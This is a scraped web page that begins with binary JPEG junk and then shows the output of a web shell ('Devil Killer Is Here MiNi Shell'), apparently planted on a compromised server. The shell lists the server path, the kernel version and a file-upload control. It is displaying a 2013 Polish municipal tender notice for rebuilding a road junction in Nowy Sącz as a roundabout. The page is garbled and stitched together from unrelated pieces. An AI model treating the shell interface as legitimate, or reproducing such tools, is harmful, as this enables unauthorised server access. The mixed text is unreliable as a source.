JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130528/92319-N-2013.html

<p class="kh_header"><b>Nowy Sącz: Przebudowa skrzyżowania ulic:Lwowska - Krańcowa - Barska w Nowym Sączu</b><br>
<b>Numer ogłoszenia: 92319 - 2013; data zamieszczenia: 28.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski  Zarząd Dróg , ul. Wyspiańskiego 22, 33-300 Nowy Sącz, woj. małopolskie, tel. 18-4427967, faks 18 4427800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.nowysacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa skrzyżowania ulic:Lwowska - Krańcowa - Barska w Nowym Sączu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje: 
przebudowa skrzyżowania ulic Lwowska-Krańcowa-Barska na rondo o średnicy zewnętrznej 33 m ze skanalizowanymi wlotami z przebudową odcinka kanału deszczowego w ul. Krańcowej, z zabezpieczeniem istniejącej sieci teletechnicznej, z przebudową sieci elektroenergetycznej
1)roboty przygotowawcze:
-ścinanie drzew piłą mechaniczną z karczowaniem pni i wywozem pni gałęzi i karpiny- 9 szt
2)roboty rozbiórkowe:
-roboty remontowe - frezowanie nawierzchni bitumicznej o gr. 10 cm z wywozem materiału z rozbiórki na odl. do 5 km- 8754,10 m2
-mechaniczne rozebranie podbudowy z kruszywa kamiennego o grubości 15 cm- 2533 m
-rozebranie obrzeży 8x30 cm na podsypce piaskowej, rozebranie krawężników betonowych 15x30 cm na podsypce cementowo piaskowej, rozebranie krawężników betonowych 20x30 cm na podsypce cementowo piaskowej, rozebranie krawężników kamiennych 20x25 cm na podsypce cementowo piaskowej, rozebranie ław pod krawężniki z betonu, rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych 50x50x7 cm na podsypce piaskowej, mechaniczne rozebranie nawierzchni z kostki kamiennej nieregularnej o wysokości 8 cm na podsypce cementowo-piaskowej- rozebranie kostki brukowej, mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o grubości 4 cm, demontaż sygnalizacji świetlnej, demontaż tablicy informacyjnej
-rozebranie istniejącego kanału- 153,5 m
3)przebudowa skrzyżowania na rondo z wykonaniem dojazdów:
-roboty ziemne wykon.koparkami podsiębiernymi o poj.łyżki 0.60 m3 w gr.kat.III z transp.urobku samochod.samowyładowczymi na odległość do 5 km- 1871 m3
-wykonanie stabilizacji istniejącej podbudowy cementem i EN-1 gr.35 cm- 8816 m2
-ława pod krawężniki betonowa z oporem- 112 m3
-krawężniki betonowe wystające o wymiarach 15x30 cm na podsypce cementowo-piaskowej- 1134 m
-krawężniki kamienne wystające o wymiarach 20x25 cm na podsypce cementowo-piaskowej - krawężniki granitowe- 177 m
-podbudowa betonowa z dylatacją - grubość warstwy po zagęszczeniu 22 cm- 150 m2
-nawierzchnia z kostki kamiennej rzędowej o wysokości 16 cm na podsypce cementowo-piaskowej - kostka granitowa 15 x 17- 150 m2
-nawierzchnie z kostki brukowej betonowej grubość 8 cm na podsypce cementowo-piaskowej- ściek- 60 m2
-podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 20 cm- 8269 m2
-regulacja pionowa studzienek dla włazów kanałowych wraz z wymianą włazów- 16 szt
-regulacja pionowa studzienek dla włazów kanałowych- 15 szt
-regulacja pionowa studzienek dla kratek ściekowych ulicznych z wymianą kratki ściekowej- 4 szt
-mechaniczne oczyszczenie podbudowy tłuczniowej lub z gruntu stabilizowanego cementem- 8269 m2
-podbudowa z mieszanki mineralno-bitumicznej klincowo-żwirowej o lepiszczu asfaltowym - grubość warstwy po zagęszczeniu 7 cm- beton asfaltowy KR3 AC22P- 5855 m2
-skropienie nawierzchni drogowej asfaltem skropienie międzywarstwowe- 14123 m2
-nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszcz. 6 cm- beton asfaltowy KR3 AC16W- 5855 m2
-nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszcz. 9 cm- beton asfaltowy KR3 AC16W- 2414 m2
-nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa ścieralna asfaltowa - grubość po zagęszcz. 5 cm- beton asfaltowy KR3 AC11S- 8269 m2
4)chodnik:
-roboty ziemne wykon.koparkami podsiębiernymi o poj.łyżki 0.60 m3 w gr.kat.III z transp.urobku samochod.samowyładowczymi na odległość do 5 km- 133 m3
-ława pod krawężniki betonowa zwykła- 5 m3
-mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV- 1771 m2
-podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 15 cm- 1258+22 m2
-obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej z wypełnieniem spoin piaskiem- 250 m
-nawierzchnie z kostki brukowej betonowej grubość 6 cm na podsypce piaskowej- 1258 m2
-nawierzchnie z kostki brukowej betonowej grubość 8 cm na podsypce piaskowej- 22 m2
-wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym z zagęszczeniem mechanicznym - średnia grubość warstwy po zagęszczeniu do 10 cm- 25 m3
-remont cząstkowy nawierzchni z klinkieru drogowego na płask na podsypce piaskowej z wypełnieniem spoin piaskiem - przełożenie nawierzchni chodnika z kostki brukowej- 1104 m2
-przestawienie krawężników kamiennych wystających 20x25 cm na podsypce cementowo-piaskowej- 58 m
-przestawienie krawężników betonowych wystających 15x30 cm na podsypce cementowo-piaskowej- 25 m
-przestawienie krawężników betonowych wystających 20x30 cm na podsypce cementowo-piaskowej- 50 m
5)zieleniec:
-rozścielenie ziemi urodzajnej spycharkami na terenie płaskim ziemią z wykopów- 90 m3
-ręczne rozrzucenie ziemi żyznej lub kompostowej na terenie płaskim grubość warstwy 10 cm ziemia urodzajna (humus)- 0,103 ha
-wykonanie trawników dywanowych siewem na gruncie kat. I-II bez nawożenia- 1028 m2
6)oznakowanie poziome i pionowe:
-wykonanie projektu organizacji ruchu skrzyżowania- 1 komplet
-oznakowanie poziome nawierzchni bitumicznych - grubowarstwowe, chemoutwardzalne- 442 m2
-oznakowanie pionowe - montaż słupka do znaków drogowych- 67 szt
-oznakowanie pionowe - montaż znaku drogowego- 69 szt
7)kanalizacja deszczowa- roboty ziemne:
-roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym- 0,153 km
-roboty ziemne wykon.koparkami podsiębiernymi o poj.łyżki 0.60 m3 w gr.kat.IV z transp.urobku samochod.samowyładowczymi na odległość do 5 km- 895 m3
-ażurowe umocnienie pionowych ścian wykopów liniowych o głębok.do 3.0 m wypraskami w grunt.suchych kat.III-IV wraz z rozbiór.(szer.do 2m)- 825 m2
-zasypywanie wykopów spycharkami z przemieszczeniem gruntu na odl. do 10 m w gruncie kat. I-III - wykorzystanie kruszywa z rozbiórki podbudowy- 398 m3
-zagęszczenie nasypów ubijakami mechanicznymi; grunty spoiste kat. III-IV. Wskaźnik zagęszczenia Js = 1.00- 398 m3
8)kanalizacja deszczowa- roboty montażowe:
-kanały rurowe - podłoża z materiałów sypkich o grubości 20 cm- 415 m2
-kanały z rur polietylenowych typu WEHOLITE-SPIRO o śr. nominalnej 800 mm - wykopy umocnione - rury PP dwuścienne SN8- 153,5 m
-kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm -200x5,9- 153,5 m
-obsypka rurociągu kruszywem dowiezionym- 299 m3
-studnie rewizyjne z kręgów betonowych o śr. 1200 mm w gotowym wykopie o głębok. 2,5 m - z kręgów łączonych na uszczelki z wklejonymi przejściami szczelnymi z włazami żeliwnymi D400- 3 studnie
-studnie rewizyjne z kręgów betonowych o śr. 1500 mm w gotowym wykopie o głębok. 2,5 m - z kręgów łączonych na uszczelki z wklejonymi przejściami szczelnymi z włazami żeliwnymi D400- 2 studnie
-studnie rewizyjne z kręgów betonowych o śr. 1000 mm w gotowym wykopie o głębok. 2,5 m- 1 studnia
-studzienki ściekowe z gotowych elementów betonowe o śr. 500 mm z osadnikiem bez syfonu- 22 szt
-próba wodna szczelności sieci wodociągowych z rur typu HOBAS, PCW, PVC,PE, PEHD o śr. 800 mm
-inspekcja wizyjna- monitoring wykonanego odcinka kanalizacji deszczowej wraz z dokumentacją w formie elektronicznej (nośnik CD) i opisowej- 154 m
9)zabezpieczenie istniejącej sieci teletechnicznej:
-zabezpieczenie rurami dwudzielnymi istniejącej kanalizacji tt 6-otworowej,
-zabezpieczenie rurami dwudzielnymi istniejącej kanalizacji tt 3-otworowej,
-zabezpieczenie rurami dwudzielnymi istniejącej kanalizacji tt 2-otworowej,
-wybudowanie ław betonowych dla kanalizacji tt 6-otworowej,
-wybudowanie ław betonowych dla kanalizacji tt 3-otworowej,
-wybudowanie ław betonowych dla kanalizacji tt 2-otworowej,
-rura dwudzielna HDPE AO120PS-306 m,
-rama typu ciężkiego 600x1000-3 szt,
-pokrywa typu ciężkiego 600x1000-3 szt
10)przebudowa linii kablowych SN i nn
-demontaż rur ochornnych z kabli wielożyłowych o masie do 24kg/m - HAKnFtA 3x240mm2- 22 m
-układanie w wykopie rur ochronnych dwudzielnych- 22 mm
-układanie w rurach kabli wielożyłowych o masie do 24kg/m - HAKnFtA 3x240mm2 istniejący- 22 m
-układanie w wykopie rur ochronnych dwudzielnych - rury rezerwowe- 22 m
-demontaż rur ochronnych z kabli wielożyłowych o masie do 3kg/m - YAKY 4x120mm2- 22 m
-układanie w wykopie rur ochronnych dwudzielnych- 22 m
-układanie w rurach kabli wielożyłowych o masie do 3kg/m - YAKY 4x120mm2 istniejący- 22 m
-układanie w wykopie rur ochronnych dwudzielnych - rury rezerwowe- 22 m
-demontaż z rowów kablowych kabli wielożyłowych o masie do 2kg/m, z przykryciem folią kalandrowaną z PCW uplastycznionego, o grubości powyżej 0,4-0,6mm - YAKY 4x120mm2 do ponownego ułożenia- 39 m
-układanie w wykopie rur ochronnych dwudzielnych- 10 m
-układanie w rurach kabli wielożyłowych o masie do 3kg/m - YAKY 4x120mm2 istniejący- 10 m
-ręczne układanie w rowach kablowych kabli wielożyłowych o masie do 2kg/m, z przykryciem folią kalandrowaną z PCW uplastycznionego, o grubości powyżej 0,4-0,6mm - YAKY 4x120mm2 istniejący- 29 m
-układanie w wykopie rur ochronnych dwudzielnych- 32 m
-wykonanie przepustów długości do 30m w gruncie kategorii IV rurami dwudzielnymi o średnicy 2x160mm pod przeszkodami terenowymi metodą płucząco-wierconą sterowaną- 21 m
-wykonanie przepustów długości do 30m w gruncie kategorii IV rurami dwudzielnymi o średnicy 160mm pod przeszkodami terenowymi metodą płucząco-wierconą sterowaną- 18 m
-układanie w rurach, złączach kablowych i stacji transformatorowej kabli wielożyłowych o masie do 5,5kg/m - YAKXS 4x240mm2- 128 m
-ręczne układanie w rowach kablowych kabli wielożyłowych o masie do 5,5kg/m, z przykryciem folią kalandrowaną z PCW uplastycznionego, o grubości powyżej 0,4-0,6mm - YAKXS 4x240mm2- 239 m
-odłączenie żył kabli o przekroju do 120mm2 w izolacji polwinitowej od zacisków- 24 szt
-demontaż ze złącza kablowego kabli wielożyłowych o masie do 3kg/m - YAKY 4x95mm2- 12 m
-obróbka na sucho kabli energetycznych aluminiowych, na napięcie do 1kV, o izolacji i powłoce z tworzyw sztucznych, 4-żyłowych o przekroju żyły do 240mm2- 4 szt
-podłączenie żył kabla o przekroju do 240mm2 w izolacji polwinitowej pod zaciski- 16 szt.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające nie przekracza 50% zamówienia podstawowego i było przewidziane w ogłoszeniu dla zamówienia podstawowego i jest zgodne z jego przedmiotem.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 50 000 zł (słownie: pięćdziesiąt tysięcy złotych 00/100) - nie później niż w terminie składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców którzy w ciągu 5 ostatnich lat wykonali w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli przynajmniej 2 zamówienia swoim rodzajem i wartością odpowiadające przedmiotowi zamówienia, polegające na budowie/przebudowie/remoncie ulicy/drogi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców którzy dysponują niezbędnymi do wykonania zamówienia narzędziami, wyposażeniem zakładu i urządzeniami technicznymi:
-WMB min. 100Mg/h lub zapewnienie dostawy betonu asfaltowego z wytwórni położonej w uzasadnionej technologicznie odległości - należy podać lokalizację WMB
-spycharka gąsienicowa 
-koparka gąsienicowa 
-równiarka samojezdna
-walec samojezdny wibracyjny
-walec samojezdny statyczny
-walec samojezdny ogumiony
-rozkładarka mas bitumicznych sterowana elektronicznie
-sprężarka powietrza
-zagęszczarka wibracyjna
-samochód samowyładowczy
-frezarka o szerokości min. 2,00 m</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców dysponujących osobami zdolnymi do wykonania zamówienia tj. uprawnionych do sprawowania funkcji: 
1.kierownik budowy robót drogowych
2.kierownik robót sieci kanalizacyjnych
3.kierownik robót sieci teletechnicznych
4.kierownik robót sieci energetycznych 
posiadający uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie o których mowa w ustawie Prawo budowlane oraz legitymujący się dokumentami potwierdzającymi przynależność do właściwej izby samorządu zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pod uwagę będą brane oferty wykonawców którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia następujących warunków:
a.ograniczenia/rezygnacji lub zwiększenia zakresu robót,
b.konieczności przedłużenia terminu wykonania umowy z powodu konieczności zmiany terminu w przypadku wystąpienia tzw. siły wyższej tj. wyjątkowego zdarzenia lub okoliczności, warunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót a także w przypadku wystąpienia robót dodatkowych, koniecznych do wykonania podstawowego zakresu zadania oraz konieczności wprowadzenia zmian ilościowych do przedmiaru robót na skutek sytuacji niemożliwej wcześniej do przewidzenia, zmian technologii wykonania robót lub zmiany materiałów, jeżeli nowe rozwiązania będą korzystne dla Zamawiającego, przy zachowaniu niepogorszonych standardów jakościowych, konieczności wykonania prac wynikających z zaleceń organów administracji architektoniczno-budowlanej np. nadzoru budowlanego, PIP, Konserwatora Zabytków itp. wydanych stosownie do ich właściwości,
